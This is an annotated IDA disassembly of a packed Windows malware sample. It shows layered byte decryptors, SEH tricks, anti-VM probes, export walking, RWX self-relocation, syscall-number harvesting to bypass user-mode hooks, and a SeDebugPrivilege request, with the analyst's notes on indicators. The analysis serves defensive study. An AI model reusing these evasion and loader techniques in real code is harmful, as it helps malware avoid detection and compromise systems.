3B820FFFh, 81000002h dd 60244Ah, 0FE8BE000h, 7A035652h, 107A0314h, 39C085F7h dd 10h, 14752000h, 4304BD89h, 0B58D0010h, 1039CCh, 10698D8Bh dd 0A4F30010h, 0A73B957h, 0B58D0000h, 101000h, 0B1A5F3h dd 0A4F302E3h, 39C085F7h, 10h, 840F2000h, 0AEh, 0E82873FFh dd 0FFFFED9Dh, 42F4958Bh, 0D2850010h, 98840Fh, 0B58B0000h dd 1042B4h, 81104A8Bh, 60244Ah, 4A2BE000h, 33027308h, 147203C9h dd 10698D3Bh, 8D8B0010h, 101069h, 3C8B5672h, 69A58324h dd 1010h, 69A783h, 8B000000h, 4A01087Ah, 87F70308h, 0C8858BF7h dd 0F7001042h, 1039C085h, 4000h, 0F7027400h, 0C720318h dd 0B5893029h, 104300h, 128738Bh, 0C085F730h, 40001039h dd 74000000h, 5118F702h, 0FFFC2BE8h, 0CEB59FFh, 2B287303h dd 56510C72h, 595FA4F3h, 39CCB58Dh, 0BD890010h, 104304h dd 5E5FA4F3h, 8D92310Fh, 13787h, 0BE953A00h, 75001039h dd 78D26906h, 66123456h, 0E8E75089h, 0FFFFD9E1h, 0C4A8B5Ah dd 0F7104A03h, 1039C085h, 0 dd 5418D20h, 8D891375h, 104300h, 10698503h, 0A7830010h dd 69h, 28432B00h, 548789h, 85F70000h, 103F7Ch, 1, 43C70774h dd 0A0A0A008h, 0C085F7A0h, 1039h, 74004000h, 5BE85207h dd 5AFFFFF7h, 43008D8Bh, 5E30010h, 0EB284B89h, 0FC8D8B0Dh dd 0E3001042h, 8B03EB02h, 85F7284Bh, 1039C0h, 3, 858B1474h dd 104304h, 42EC8D03h, 85030010h, 1042E8h, 4A8B0801h, 0B8858B10h dd 39001042h, 373084Ah, 1084A89h, 63831042h, 858B0058h dd 1042C0h, 29CC68h, 8420100h, 50430159h, 39BE958Ah, 85F70010h dd 1039C0h, 20000000h, 8D030674h, 101069h, 85F700B6h, 1039C0h dd 20000h, 0C6FE1475h, 39C085F7h, 10h, 6750004h, 39BFB58Ah dd 85F70010h, 1039C0h, 4000h, 78A0B75h, 2AAC202h, 0EBF7E2D6h dd 32078A09h, 0D602AAC2h db 0E2h, 0F7h ; --------------------------------------------------------------------------- loc_3100B94A: ; CODE XREF: UPX2:3100B54Bj xor edx, edx mov esp, fs:[edx] pop dword ptr fs:[edx] pop eax cmp dword ptr [ebp+104298h], 0 jz near ptr dword_3100AFE8+437h push dword ptr [ebp+1042B4h] call dword ptr [ebp+103EEEh] push dword ptr [ebp+1042B0h] call dword ptr [ebp+103E62h] lea ecx, [ebp+10429Ch] lea edx, [ebp+1042A4h] push ecx push edx push 0 push dword ptr 
[ebp+104298h] call dword ptr [ebp+103EE2h] push dword ptr [ebp+104298h] call dword ptr [ebp+103E62h] lea esi, [ebp+104184h] push dword ptr [ebp+104294h] push esi call dword ptr [ebp+103EDEh] and dword ptr [ebp+104298h], 0 retn ; --------------------------------------------------------------------------- db 0E8h align 10h dd 81016A5Dh, 1038CBEDh, 0FF05800h, 158885C1h, 0C0850010h dd 0FFC883C3h, 85C10FF0h, 101588h, 103DC3h, 1C75002Ah dd 247C8166h, 75716C0Ch, 0C4E86013h, 75FFFFFFh, 0FAB5E805h dd 0D2E8FFFFh, 61FFFFFFh, 782DFF2Eh, 0B8123456h, 25h, 0FFA5E860h dd 3975FFFFh, 3024448Bh, 4184B58Dh, 508B0010h, 3A816608h dd 25730206h, 6856h, 0C48B00FFh, 5052006Ah, 3F2E95FFh dd 0C4830010h, 5C3E8108h, 755C3F3Fh, 4C68303h, 0FFFA62E8h dd 0FF7FE8FFh, 0C361FFFFh, 74B8h, 0B8B1EB00h, 2Fh, 1DE8h dd 20C200h, 30B8h, 10E800h, 24C20000h, 185B800h, 3E80000h dd 0C2000000h, 548D002Ch, 2ECD0C24h, 7C00F883h, 0E86019h dd 8B000000h, 5D302454h, 0ED811A8Bh, 1039A2h, 0FFE0B3E8h dd 4C261FFh, 7010200h, 40060305h, 877622D4h, 0C8E896h dd 8B6B0000h, 0FFh, 124h dup(0) dd 47000000h, 0AD7C809Bh, 317C8308h, 7C9103h, 126h dup(0) dd 9800h, 1300h dup(0) ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame public start start proc near cld push ebp mov ebp, esp call sub_3101101F cmc clc call sub_310110C4 stc stc mov ebp, 12FFC0h ; DATA XREF: sub_3101101F+Cw cmc mov eax, eax jmp loc_31011056 start endp ; =============== S U B R O U T I N E ======================================= sub_3101101F proc near ; CODE XREF: start+4p push dword ptr fs:0 mov fs:0, esp mov dword ptr ds:loc_31011012+1, ebp xchg ebx, ebx nop cmc xor ecx, ecx push ecx push ecx push ecx push ecx push 80000000h push 80000000h push ecx push ecx push ecx push ecx push 80000000h push ecx push ecx call ds:dword_31007090 ; GetProcAddress loc_31011056: ; CODE XREF: start+1Aj xchg ebx, ebx mov eax, eax sub edi, edi sub ecx, ecx xchg ebx, ebx mov cl, 42h jmp short $+2 jmp short $+2 loc_31011066: ; CODE 
; (cont.) XREF: sub_3101101F+4Dj
; ---------------------------------------------------------------------------
; Analyst notes (IDA/MASM syntax, 32-bit x86, memory dump).  This is the
; second layer of the packer stub.  sub_3101101F (entered from `start`, see
; above) pushed the old fs:0 and pointed fs:0 at the stack, so the SEH
; handler is the return address inside `start` (start+9: cmc / clc /
; call sub_310110C4).  The loop below just counts edi up to 42h (the value
; loaded into cl above); edi then serves as the running key for the byte
; decryptor in sub_31011087.  xchg ebx,ebx / mov eax,eax are no-op padding.
; ---------------------------------------------------------------------------
        lea     edi, [edi+1]            ; edi += 1 per iteration
        xchg    ebx, ebx
        dec     ecx
        jnz     short loc_31011066
        xchg    ebx, ebx
        call    sub_31011087            ; decrypt next stage and jump into it
        mov     eax, eax
sub_3101101F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; sub_31011077: decrypt one byte in place.
; In:  ebx -> byte, di = running key
; Out: [ebx] = ([ebx] - di) & 0FFh   (16-bit subtract, only al is stored)
; The jmp $+2 / cld / cmc instructions are padding.
sub_31011077 proc near ; CODE XREF: sub_31011087:loc_31011098p
        xchg    al, [ebx]
        jmp     short $+2
        sub     ax, di
        cld
        mov     [ebx], al
        jmp     short $+2
        cmc
        retn
sub_31011077 endp
; ---------------------------------------------------------------------------
        db 87h, 0DBh
; =============== S U B R O U T I N E =======================================
; sub_31011087: decrypt 29CCh bytes starting 62h bytes past this routine's
; own return address (per-byte key = edi, incremented once per byte), then
; unhook the stub's SEH record, drop the frame built in `start`, and jump
; into the decrypted bytes.  The listing already shows that region decoded,
; i.e. the dump was taken after this ran.
sub_31011087 proc near ; CODE XREF: sub_3101101F+51p
        pop     ebx                     ; ebx = return address
        add     ebx, 62h                ; ebx = start of the encrypted region
        push    ebx
        xor     esi, esi
        or      esi, 29CCh              ; esi = byte count
        cld
loc_31011098:                           ; CODE XREF: sub_31011087+23j
        call    sub_31011077            ; [ebx] -= di
        nop
        mov     eax, eax
        inc     ebx
        inc     edi                     ; key advances by one per byte
        dec     esi
        xchg    ebx, ebx
        xchg    ebx, ebx
        clc
        or      esi, esi
        jnz     short loc_31011098
        pop     ebx                     ; ebx = start of the decrypted region
        clc
        mov     edi, [ebp-8]            ; previous fs:0, pushed by sub_3101101F
        mov     fs:0, edi               ; restore it: the stub's SEH handler is gone
        xchg    ebx, ebx
        stc
        leave                           ; discards the frame set up in `start`
        stc
        stc
        jmp     short $+2
        jmp     ebx                     ; transfer into the decrypted code
sub_31011087 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
        align 2
        stc
        cld
; =============== S U B R O U T I N E =======================================
; sub_310110C4: body of the SEH handler that is reached through start+9.
; Because the handler entry does `call sub_310110C4`, the stack here is:
;   [esp]     our return address (start+0Eh)
;   [esp+4]   the exception dispatcher's return address
;   [esp+8]   ExceptionRecord   [esp+0Ch] EstablisherFrame
;   [esp+10h] ContextRecord
; It pops its own return address into ContextRecord+0B8h (Eip in an x86
; CONTEXT) and returns 0 (ExceptionContinueExecution): any fault raised
; while the stub's handler is installed resumes at start+0Eh, where
; `mov ebp, 12FFC0h` -- whose immediate sub_3101101F patched with the real
; ebp (see the DATA XREF on it above) -- restores ebp.  Whether the
; GetProcAddress call with zeroed arguments in sub_3101101F is meant to
; raise that fault cannot be told from this listing -- TODO confirm live.
sub_310110C4 proc near ; CODE XREF: start+Bp
arg_C = dword ptr 10h
        mov     eax, [esp+arg_C]        ; eax = CONTEXT *
        pop     dword ptr [eax+0B8h]    ; CONTEXT.Eip = our return address
        xor     eax, eax                ; ExceptionContinueExecution
        retn
sub_310110C4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
        db 89h, 0C0h
; ---------------------------------------------------------------------------
; Entry of the decrypted stage (IDA defined no proc).  Locates itself
; (call $+5 / mov eax,[esp]), spills ebx/esi/edi into a data area at
; eax+3303h.., and chooses the address from which the export walk on the
; next line will locate a module base (ebx).  In the common case that is
; the caller's return address at [esp+4] -- presumably inside kernel32 when
; the loader called this entry point.  The alternative branch (bit 400000h
; of the dword at +29BBh set) derives ebx from a saved instruction stored at
; +29BFh: opcode E8h (CALL rel32) -> follow its target, otherwise read a
; stored absolute pointer.  The meaning of the +29BBh flags and the origin
; of the saved instruction are not determinable here.
        cmc
        jmp     short $+2
        cld
        call    $+5
        cld
        mov     eax, [esp]              ; eax = address of this instruction
        mov     ecx, [eax+29BBh]        ; flags dword kept in the stage's data
        mov     [eax+3303h], ebx
        and     ecx, 400000h
        mov     ebx, [esp+4]            ; caller's return address
        jz      short loc_31011124
        pop     ecx
        mov     [eax+3307h], esi
        mov     cl, [eax+29BFh]         ; saved opcode byte
        mov     [eax+330Bh], edi
        cmp     cl, 0E8h                ; CALL rel32 ?
        jz      short loc_31011118
        mov     ebx, [eax+29C1h]        ; not a CALL: stored absolute pointer
        jmp     short loc_31011122
; ---------------------------------------------------------------------------
loc_31011118:                           ; CODE XREF: UPX2:3101110Ej
        mov     ecx, [eax+29C0h]        ; rel32 of the saved CALL
        mov     ebx, [ecx+ebx+2]
loc_31011122:                           ; CODE XREF:
; (cont.) UPX2:31011116j
        mov     ebx, [ebx]              ; dereference -> an address inside the target module
loc_31011124:                           ; CODE XREF: UPX2:310110F6j
; ebx = an address inside the module to be scanned (see the entry code above).
        push    ebp
        mov     ebp, eax
        sub     dword ptr [esp+4], 80DCh ; rewrite the saved EIP slot: the `retn` at
                                        ;   loc_310111F3 (next line) returns to this value,
                                        ;   presumably the host's original entry point
        sub     ebp, 101005h            ; ebp = delta base; [ebp+1010xxh] addresses this stage
        mov     edi, [esp+4]
        lea     esi, [ebp+1039CCh]
        mov     ecx, 0
        rep movsb                       ; ecx = 0 as dumped: copies nothing (count may be patched at runtime)
        sldt    cx                      ; LDT selector -- a known VM probe (non-zero under some hypervisors)
        test    ecx, ecx
        jnz     short loc_31011152
        or      eax, 0FFFFFFFFh
        int     2Eh                     ; legacy NT system-call gate with service number -1:
                                        ;   harmless on a real Windows kernel; looks like an
                                        ;   anti-emulation probe (IDA's "DOS 2+" note does not apply)
loc_31011152:                           ; CODE XREF: UPX2:3101114Bj
; Scan backwards in 100h steps for the DOS stub text "This" at offset 4Eh,
; then verify the PE signature: ebx becomes the module base.
        and     ebx, 0FFFFF000h
loc_31011158:                           ; CODE XREF: UPX2:31011167j
        cmp     dword ptr [ebx+4Eh], 73696854h ; "This" (...program cannot be run in DOS mode)
        jz      short loc_31011169
loc_31011161:                           ; CODE XREF: UPX2:31011176j
        sub     ebx, 100h
        jnz     short loc_31011158
loc_31011169:                           ; CODE XREF: UPX2:3101115Fj
        mov     eax, ebx
        add     eax, [ebx+3Ch]          ; eax = IMAGE_NT_HEADERS (e_lfanew)
        mov     edx, [eax+78h]          ; export directory RVA (DataDirectory[0])
        cmp     word ptr [eax], 4550h   ; "PE"
        jnz     short loc_31011161
        add     edx, ebx                ; edx = IMAGE_EXPORT_DIRECTORY
        mov     esi, [edx+20h]          ; AddressOfNames
        mov     ecx, [edx+18h]          ; NumberOfNames
        add     esi, ebx
        push    ecx
loc_31011183:                           ; CODE XREF: UPX2:loc_31011197j
; Partial match for "GetProcAddress": "tP" at +2 and "ocAd" at +5.
        lodsd
        add     eax, ebx
        cmp     word ptr [eax+2], 5074h ; "tP"
        jnz     short loc_31011197
        cmp     dword ptr [eax+5], 6441636Fh ; "ocAd"
        jz      short loc_3101119C
loc_31011197:                           ; CODE XREF: UPX2:3101118Cj
        loop    loc_31011183
        pop     ecx
        jmp     short loc_310111C7      ; not found: leave through the exit chunk
; ---------------------------------------------------------------------------
loc_3101119C:                           ; CODE XREF: UPX2:31011195j
        sub     [esp], ecx              ; [esp] = NumberOfNames - remaining = index of the match
        mov     esi, [edx+24h]          ; AddressOfNameOrdinals
        pop     ecx
        add     esi, ebx
        movzx   eax, word ptr [esi+ecx*2] ; ordinal
        mov     edi, [edx+1Ch]          ; AddressOfFunctions (edi keeps this value for later)
        add     edi, ebx
        mov     esi, [edi+eax*4]
        add     esi, ebx                ; esi = GetProcAddress (used as `call esi` from here on)
        lea     eax, [ebp+101137h]      ; next layer: 2889h bytes from loc_3101120E ...
        lea     ecx, [ebp+101120h]      ; ... decrypted by the loop at loc_310111FF (entry =
        mov     dx, [eax-19h]           ;     the 53h byte) with the key word 267Ah at [eax-19h]
        call    ecx
        jmp     short loc_3101120E      ; continue in the freshly decrypted code
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_31011255
loc_310111C7:                           ; CODE XREF: UPX2:3101119Aj ; sub_31011255+10j ...
; Exit chunk of sub_31011255 (also the not-found path of the export walk).
; [esp+arg_0] is the return slot rewritten at loc_31011124.
        mov     eax, [ebp+1039C0h]      ; stage config/flags dword (right after the decrypted region)
        and     eax, 400000h
        jz      short loc_310111F3
        lea     esi, [ebp+1039C4h]
        lodsd
        mov     edi, [esp+arg_0]        ; edi = the return target address itself
        stosd                           ; write 4 bytes there ...
        mov     ebx, [ebp+104308h]
        movsb                           ; ... plus 1 more byte: looks like stolen-bytes
                                        ;   restoration of the host entry point -- confirm
        mov     edi, [ebp+104310h]      ; restore ebx/edi/esi from saved copies
        mov     esi, [ebp+10430Ch]
loc_310111F3:                           ; CODE XREF: sub_31011255-83j
        pop     ebp
        retn                            ; to the rewritten return slot
; END OF FUNCTION CHUNK FOR sub_31011255
; ---------------------------------------------------------------------------
        db 7Ah, 26h, 53h                ; 7Ah,26h = key word read by `mov dx,[eax-19h]` above;
                                        ;   53h = push ebx, the entry of the decryptor below
; ---------------------------------------------------------------------------
; Second-layer decryptor (entered at the 53h byte = [ebp+101120h]).
; In: eax -> region start (loc_3101120E), dx = 16-bit key.  Each byte is
; XORed with dl; the key is then reduced by bl and both the key and its
; decrement are byte-swapped, so the mask changes every byte.
        mov     ecx, 2889h              ; byte count (region ends at [ebp+1039C0h])
        mov     ebx, edx                ; bl/bh = copy of the key used as decrement
loc_310111FF:                           ; CODE XREF: UPX2:3101120Aj
        xor     [eax], dl
        sub     dl, bl
        add     eax, 1
        xchg    bl, bh
        xchg    dl, dh
        loop    loc_310111FF
        pop     ebx                     ; matches the push ebx at entry
        retn
; ---------------------------------------------------------------------------
; From here on the listing shows decrypted code.  IDA did not follow the
; call-over-string idiom: each `call` pushes the address of the ASCII string
; that follows it (shown as instructions), and the code at the call target
; is `push ebx / call esi` = GetProcAddress(kernel32, name).
loc_3101120E:                           ; CODE XREF: UPX2:310111C5j
        call    near ptr loc_3101121D+2 ; push &"CloseHandle"
        inc     ebx                     ; bytes 43 6C 6F 73 65 48 61 6E 64 6C 65 00 = "CloseHandle",0
        insb
        outsd
        jnb     short near ptr loc_3101127A+3
        dec     eax
        popa
        outsb
        db 64h
        insb
loc_3101121D:                           ; CODE XREF: UPX2:loc_3101120Ep
        add     gs:[ebx-1], dl          ; 65 00, then 53 FF D6 = push ebx / call esi
        setalc
        mov     [ebp+103E62h], eax      ; [103E62h] = CloseHandle
        call    near ptr loc_31011239+1 ; push &"CreateEventA"
        inc     ebx                     ; bytes decode as "CreateEventA",0
        jb      short loc_31011295
        popa
        jz      short near ptr loc_31011297+1
        inc     ebp
        jbe     short near ptr loc_31011297+4
        outsb
        jz      short loc_3101127A
loc_31011239:                           ; CODE XREF: UPX2:31011228p
        add     [ebx-1], dl             ; 00, then 53 FF D6 = push ebx / call esi
        setalc
        mov     [ebp+103E66h], eax      ; [103E66h] = CreateEventA
        call    sub_31011255            ; push &"GetLastError", enter the main routine
        inc     edi                     ; bytes decode as "GetLastError",0
        db 65h
        jz      short near ptr loc_31011297+1
        popa
        jnb     short near ptr loc_310112C1+2
        inc     ebp
        jb      short near ptr loc_310112C1+3
        outsd
        jb      short $+2
; =============== S U B R O U T I N E =======================================
; sub_31011255: main body of the decrypted stage.
; Entered by `call` with the address of "GetLastError" on the stack;
; esi = GetProcAddress, ebx = module base found by the export walk,
; ebp = delta base.  Sequence: resolve GetLastError -> create the named
; event (single-instance guard) -> build the API table -> relocate this
; stage into fresh RWX memory and continue there (next line).
sub_31011255 proc near ; CODE XREF: UPX2:31011243p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 310111C7 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 3101160B SIZE 0000000B BYTES
        push    ebx
        call    esi                     ; GetProcAddress(ebx, "GetLastError"): esi was set at
                                        ;   loc_3101119C; IDA's "InternetCloseHandle" label
                                        ;   does not match that data flow
        mov     [ebp+103E6Ah], eax      ; [103E6Ah] = GetLastError
        call    sub_31011636            ; CreateEventA(&sa_with_null_dacl, 0, 0, "Vx_4")
        test    eax, eax
        jz      loc_310111C7            ; no event -> leave
        push    eax                     ; event handle (consumed by CloseHandle at loc_3101160B)
        call    dword ptr [ebp+103E6Ah] ; GetLastError()
        test    eax, eax
        jnz     loc_3101160B            ; non-zero after a successful create is consistent with
                                        ;   ERROR_ALREADY_EXISTS: another instance runs -> exit
loc_3101127A:                           ; CODE XREF: UPX2:31011237j ; UPX2:31011216j
; One-shot flag at [ebp+10153Fh]: on the first pass copy [ebp+104308h] into
; [ebp+101598h] and clear the flag; otherwise [ebp+101598h] = 0 (loc_31011297).
        cmp     byte ptr [ebp+10153Fh], 1
        jnz     short loc_31011297
        push    dword ptr [ebp+104308h]
        dec     byte ptr [ebp+10153Fh]
        pop     dword ptr [ebp+101598h]
loc_31011295:                           ; CODE XREF: UPX2:3101122Ej
        jmp     short loc_3101129E
; ---------------------------------------------------------------------------
loc_31011297:                           ; CODE XREF: sub_31011255+2Cj ; UPX2:31011231j ...
        and     dword ptr [ebp+101598h], 0
loc_3101129E:                           ; CODE XREF: sub_31011255:loc_31011295j
        and     dword ptr [ebp+101588h], 0 ; clear three state slots ([10158Ch] is later
        and     dword ptr [ebp+10158Ch], 0 ;   used as a handler offset by the IRC line
        and     dword ptr [ebp+101590h], 0 ;   parser, see loc_31011D66)
        push    edi                     ; edi = kernel32 AddressOfFunctions (from loc_3101119C)
        mov     byte ptr [ebp+1012D4h], 1
        mov     [ebp+103E6Eh], esi      ; [103E6Eh] = GetProcAddress, used by sub_31011673
loc_310112C1:                           ; CODE XREF: UPX2:3101124Dj ; UPX2:31011250j
; Build the API table at [ebp+103E7Ah]: 20h kernel32 exports resolved from
; the NUL-separated name list at [ebp+101604h] by sub_31011673 (which calls
; [ebp+103E6Eh](ebx, name) per entry and stores the result with stosd).
; That list is the one shown further down in this listing: it starts with
; lstrlen right after "\BaseNamedObjects\VtSect" and ends with WriteFile,
; 32 names.  Slot i = [ebp+103E7Ah + 4*i]; slot names quoted below follow
; that order (6 = CreateToolhelp32Snapshot, 13 = GetModuleHandleA,
; 16 = GetVersion, 27 = Sleep, 30 = VirtualAlloc) -- confirm against a live
; resolve before relying on them.
        lea     esi, [ebp+101604h]
        xor     ecx, ecx
        lea     edi, [ebp+103E7Ah]
        mov     cl, 20h
        call    sub_31011673
        pop     edi
        call    dword ptr [ebp+103EBAh] ; slot 16: GetVersion()
        shr     eax, 1Fh                ; top bit set = Win9x platform
        jz      loc_310113BA            ; NT: take the section-mapping path below
; --- Win9x path ---
        mov     eax, [edi+14h]          ; kernel32 export at function-table index 5
        push    40h                     ; PAGE_EXECUTE_READWRITE
        add     eax, ebx
        push    8001000h                ; MEM_COMMIT | 8000000h
        mov     [ebp+103E72h], eax      ; [103E72h] = that export, used as a dispatcher below
        push    7328h                   ; size
        push    0
        call    dword ptr [ebp+103EF2h] ; slot 30: VirtualAlloc(0, 7328h, 8001000h, RWX)
        test    eax, eax
        jz      loc_3101160B
        xchg    eax, edi                ; edi = new RWX block
        lea     esi, [ebp+101000h]
        mov     ebp, edi
        mov     ecx, 0CCAh              ; 0CCAh dwords = 3328h bytes
        sub     ebp, 101000h            ; rebase ebp onto the copy
        lea     edx, [ebp+101254h]      ; = the instruction after `jmp edx`, in the copy
        rep movsd                       ; copy this stage into the RWX block ...
        jmp     edx                     ; ... and continue executing there
; ---------------------------------------------------------------------------
; Running inside the copy (9x only).  The 1000xh values are opaque request
; codes for the function in [103E72h]; not analysed further here.
        sub     esp, 20h
        mov     edi, esp
        push    8
        xor     eax, eax
        pop     ecx
        lea     edx, [ebp+101B4Dh]
        rep stosd                       ; zero a 20h-byte struct on the stack
        mov     edi, esp
        mov     [edi+10h], edx
        inc     byte ptr [edi+1Ch]
        push    edi
        push    10003h
        call    dword ptr [ebp+103E72h]
        add     esp, 20h
        test    eax, eax
        jz      loc_3101160B
        xchg    eax, edi
        push    0
        push    1
        push    80000400h
        push    10000h
        call    dword ptr [ebp+103E72h]
        test    eax, eax
        jz      loc_3101160B
        push    0
        push    eax
        push    40000h
        push    0
        shr     eax, 0Ch
        push    edi
        push    1
        push    eax
        push    10001h
        call    dword ptr [ebp+103E72h]
        push    1000Ah
        call    dword ptr [ebp+103E72h]
        call    loc_310113AA            ; never returns, see below
        jmp     loc_3101160B
; ---------------------------------------------------------------------------
loc_310113AA:                           ; CODE XREF: sub_31011255+14Bp ; sub_31011255+162j
; ecx is reloaded with 1 on every pass, so jecxz never fires: this parks the
; thread in an endless Sleep(10) loop.
        push    1
        pop     ecx
        jecxz   short locret_310113B9
        push    0Ah
        call    dword ptr [ebp+103EE6h] ; slot 27: Sleep(10)
        jmp     short loc_310113AA
; ---------------------------------------------------------------------------
locret_310113B9:                        ; CODE XREF: sub_31011255+158j
        retn
; ---------------------------------------------------------------------------
loc_310113BA:                           ; CODE XREF: sub_31011255+8Bj
; --- NT path ---
        cmp     dword ptr [ebp+103E92h], 0 ; slot 6: CreateToolhelp32Snapshot must have resolved
        jz      loc_3101160B
        call    near ptr loc_310113D1+1 ; push &"NTDLL" (bytes 4E 54 44 4C 4C 00, shown as code)
        dec     esi
        push    esp
        inc     esp
        dec     esp
        dec     esp
loc_310113D1:                           ; CODE XREF: sub_31011255+172p
        add     bh, bh                  ; 00, then FF 95 AE 3E 10 00 = call [ebp+103EAEh]
sub_31011255 endp ; sp-analysis failed
        xchg    eax, ebp                ;   = slot 13: GetModuleHandleA("NTDLL")
        scasb
        db 3Eh
        adc     [eax], al
; Second table: 0Eh ntdll exports (the NtAdjustPrivilegesToken ...
; RtlUnicodeStringToAnsiString run of the same name list) into slots 32..45
; at [ebp+103EFAh], resolved against the ntdll base in ebx.
        lea     esi, [ebp+1017DEh]
        xor     ecx, ecx
        lea     edi, [ebp+103EFAh]
        mov     cl, 0Eh
        xchg    eax, ebx                ; ebx = ntdll base for sub_31011673
        call    sub_31011673
        cmp     dword ptr [ebp+103F2Eh], 0 ; slot 45: RtlUnicodeStringToAnsiString resolved?
        jz      loc_3101160B
; Harvest system-service numbers: an ntdll Nt* stub starts with
; `mov eax, imm32`, so [stub+1] is the service id.  They are written into
; this stage's own bytes at [ebp+103917h..103985h], so the stage can issue
; those services without going through ntdll's exports -- user-mode API
; hooks would not observe such calls; kernel-side telemetry is needed.
        mov     eax, [ebp+103EFEh]      ; slot 33: NtCreateFile
        push    dword ptr [eax+1]
        pop     dword ptr [ebp+103917h]
        mov     eax, [ebp+103F16h]      ; slot 39: NtOpenFile
        push    dword ptr [eax+1]
        pop     dword ptr [ebp+103964h]
        mov     eax, [ebp+103F02h]      ; slot 34: NtCreateProcess
        push    dword ptr [eax+1]
        pop     dword ptr [ebp+10396Bh]
        cmp     dword ptr [ebp+10396Bh], 10000h ; sanity check on the harvested id
        jnb     loc_3101160B
        mov     ecx, [ebp+103F06h]      ; slot 35: NtCreateProcessEx (may be absent)
        jecxz   short loc_3101145A
        push    dword ptr [ecx+1]
        pop     dword ptr [ebp+103978h]
        mov     ecx, [ebp+103F0Eh]      ; slot 37: NtCreateUserProcess (may be absent)
        jecxz   short loc_3101145A
        push    dword ptr [ecx+1]
        pop     dword ptr [ebp+103985h]
loc_3101145A:                           ; CODE XREF: UPX2:3101143Ej ; UPX2:3101144Fj
; Build an OBJECT_ATTRIBUTES on the stack for a named section:
;   Length 18h, RootDirectory 0, ObjectName -> UNICODE_STRING at edi,
;   Attributes 40h (OBJ_CASE_INSENSITIVE), SecurityDescriptor = the
;   NULL-DACL descriptor built by sub_31011617, SecurityQualityOfService 0.
        call    sub_31011617            ; eax -> SECURITY_ATTRIBUTES{0Ch, &sd, 0}
        lea     edi, [ebp+103F84h]
        mov     ecx, edi
        push    0                       ; SecurityQualityOfService
        neg     cl
        push    dword ptr [eax+4]       ; SecurityDescriptor (SE_DACL_PRESENT, Dacl = NULL)
        and     ecx, 3
        push    40h                     ; Attributes = OBJ_CASE_INSENSITIVE
        add     edi, ecx                ; align the UNICODE_STRING up to 4
        push    edi                     ; ObjectName
        push    0                       ; RootDirectory
        push    18h                     ; Length
; UNICODE_STRING at edi: Length 30h, MaximumLength 32h, Buffer = edi+4,
; followed by the 19h-byte ANSI name at [ebp+1015EBh] widened to UTF-16.
; By length and position that name is the "\BaseNamedObjects\VtSect"
; string shown later in this listing (19h bytes, immediately before the
; lstrlen name list).  A second copy of the wide string goes to [ebp+103E30h].
        lea     esi, [ebp+1015EBh]
        mov     ecx, 19h
        lea     eax, ds:0FFFFFFFEh[ecx*2] ; 2*19h - 2 = 30h
        stosw                           ; Length
        lea     eax, ds:0[ecx*2]        ; 32h
        stosw                           ; MaximumLength
        lea     eax, [edi+4]
        stosd                           ; Buffer
        xor     ah, ah
        lea     edx, [ebp+103E30h]
loc_310114A3:                           ; CODE XREF: UPX2:310114ACj
        lodsb
        mov     [edx], ax
        stosw
        add     edx, 2
        loop    loc_310114A3
; NtCreateSection(&h, 0Eh = SECTION_MAP_READ|WRITE|EXECUTE, &oa,
;                 MaximumSize 7328h, PAGE_EXECUTE_READWRITE, SEC_COMMIT, 0)
        mov     edx, esp                ; &OBJECT_ATTRIBUTES
        push    0
        push    7328h
        mov     ecx, esp                ; &MaximumSize (LARGE_INTEGER)
        push    0
        mov     eax, esp                ; &SectionHandle
        push    0                       ; FileHandle
        push    8000000h                ; AllocationAttributes = SEC_COMMIT
        push    40h                     ; SectionPageProtection = PAGE_EXECUTE_READWRITE
        push    ecx
        push    edx
        push    0Eh                     ; DesiredAccess
        push    eax
        call    dword ptr [ebp+103F0Ah] ; slot 36: NtCreateSection
        pop     eax                     ; eax = section handle
        add     esp, 40h                ; drop oa, size and the 8 dwords from sub_31011617
; NtMapViewOfSection(h, -1 = current process, &base, 0, 7328h, 0,
;                    &ViewSize = 7328h, ViewUnmap, 0, PAGE_EXECUTE_READWRITE)
        push    7328h
        mov     edx, esp                ; &ViewSize
        push    0
        mov     ecx, esp                ; &BaseAddress
        push    40h                     ; Win32Protect
        push    0                       ; AllocationType
        push    2                       ; InheritDisposition = ViewUnmap
        push    edx
        push    0                       ; SectionOffset
        push    7328h                   ; CommitSize
        push    0                       ; ZeroBits
        push    ecx
        push    0FFFFFFFFh              ; ProcessHandle = current process
        push    eax
        call    dword ptr [ebp+103F12h] ; slot 38: NtMapViewOfSection
        pop     edi                     ; edi = mapped view
        pop     ecx
        test    edi, edi
        jz      loc_3101160B
; Relocate this stage into the RWX section view and continue there, like
; the 9x path did with VirtualAlloc.  Host-based indicators on this path:
; section "\BaseNamedObjects\VtSect" and the event named at [ebp+101559h]
; (the "Vx_4" string below, by address), both with a NULL DACL.  By address
; arithmetic the copy resumes right after this `jmp eax`, i.e. at the bytes
; IDA left undisassembled on the next line.
        lea     esi, [ebp+101000h]
        mov     ecx, 0CCAh
        mov     ebp, edi
        rep movsd
        sub     ebp, 101000h
        lea     eax, [ebp+10144Ah]
        jmp     eax
; ---------------------------------------------------------------------------
; ---------------------------------------------------------------------------
; Bytes IDA left undisassembled; they follow the `jmp eax` above and appear
; to be reached only inside the relocated copy.  Read as code they begin
; with push eax / push esp / push 20h / push -1 / call [ebp+103F1Ah]
; (API-table slot 40, NtOpenProcessToken on the current process), and the
; dwords 65446553h 50677562h 69766972h 6567656Ch spell "SeDebugPrivilege";
; later calls go through [103E62h] (CloseHandle) and [103E92h]
; (CreateToolhelp32Snapshot).  Treat this decoding as an analyst reading,
; not as IDA output -- TODO confirm by forcing code here.
        db 50h, 54h, 6Ah
        dd 0FFFF6A20h, 103F1A95h, 5FC08500h, 4FE83475h, 0E8000001h
        dd 11h, 65446553h, 50677562h, 69766972h, 6567656Ch, 50E85700h
        dd 0FF000005h, 104288B5h, 9E95FF00h, 5700103Eh, 3E6295FFh
        dd 6A0010h, 95FF026Ah, 103E92h, 128B9h, 0E12B9700h, 54240C89h
        dd 0D695FF57h, 3300103Eh, 72A583F6h, 103Fh, 95FF5754h
        dd 103EDAh, 6674C085h, 4FE8346h, 74FFEE72h, 6A0824h, 95FF2A6Ah
        dd 103ED2h, 0DC74C085h, 588E893h, 0C9330000h, 393AE391h
        dd 103F7285h, 81327500h, 6324247Ch, 74737273h, 0AFC18128h
